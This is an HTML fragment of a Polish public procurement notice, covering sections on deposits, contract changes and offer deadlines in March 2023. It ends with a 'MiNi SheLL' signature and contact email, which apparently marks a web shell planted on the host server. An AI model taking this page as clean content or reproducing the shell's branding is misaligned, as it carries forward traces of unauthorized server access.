Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w pkt. 6 SWZ – w art. 125 ust. 1 ustawy, składane zgodnie z załącznikiem nr 2 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy.Z uwagi na ograniczenia techniczne w zakresie ilości użytych znaków.Zamawiający<br/>informuje, iż projekt umowy, w tym ewentualne treści zmian do umowy określone są w § 11 stanowiący załącznik 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://piwniczna.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Szczegółowy opis przedmiotu zamówienia , warunków jego wykonania oraz warunków udziału w postępowaniu znajduje się<br/>w SWZ oraz załącznikach<br/>stanowiących jej integralną część. Zamawiający informuje, że z uwagi na ograniczenia techniczne w zakresie ilości użytych<br/>znaków wszystkie informacje związane z prowadzonym postępowaniem zawarte są w SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com